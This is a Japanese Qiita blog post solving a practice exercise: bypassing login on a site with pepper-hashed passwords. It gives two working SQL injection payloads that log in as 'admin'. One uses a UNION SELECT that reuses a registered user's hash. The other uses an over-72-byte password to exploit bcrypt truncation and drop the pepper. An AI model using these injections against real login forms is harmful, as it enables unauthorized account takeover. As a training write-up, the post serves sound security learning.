1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

パスワードがペッパー付きハッシュ値で保存されているサイトのSQLインジェクションによる認証回避の練習問題の解答

Posted at

問題

解答

問題文にある通り、2種類の解答を記述します。
なお、前問の解答と被る部分は省略しています。

解答1

  1. 適当な攻撃用ユーザーを登録する
    スクリーンショット 2023-09-20 17.59.39.png
  2. UserIDに以下を入力し、Passwordには先ほど作成したユーザーのパスワードを入力する
    ' UNION SELECT 1, "admin", password, 4 FROM (SELECT * from users where userid = "arucarap") --
    
  3. Welcome to Underground
    スクリーンショット 2023-09-20 18.02.11.png

解答2

  1. password_hashのマニュアルを眺める
  2. 学びを得るスクリーンショット 2023-09-20 18.09.41.png
  3. 今回の問題のアルゴリズムではpassword末尾にpepperを付与していることから、password_hashのアルゴリズムをPASSWORD_BCRYPTに設定した上で72バイト以上の長さのpasswordを与えてやれば、pepperの値を切り捨てさせることができると考えられる。
  4. password_hash関数に72バイト以上の長さのパスワードを与えてハッシュを取得する
    $ php -r "echo password_hash('yuuteimiyaoukimukouhoriiyuujitoriyamaakirapepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepepe', PASSWORD_BCRYPT), PHP_EOL;"
    
    $2y$10$HNrjhgPwb0IhNB0M1hU/Wucfq8Ik0c5Gsl/fGw8gB0WOQEX1WXuzS
    
  5. 得られたハッシュを利用してUserIDに注入し、Passwordには上記で利用した長いパスワードを入力する
    ' UNION SELECT 1, "admin", "$2y$10$HNrjhgPwb0IhNB0M1hU/Wucfq8Ik0c5Gsl/fGw8gB0WOQEX1WXuzS", 4 --
    
  6. Welcome to Underground
    スクリーンショット 2023-09-20 18.02.11.png
1
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?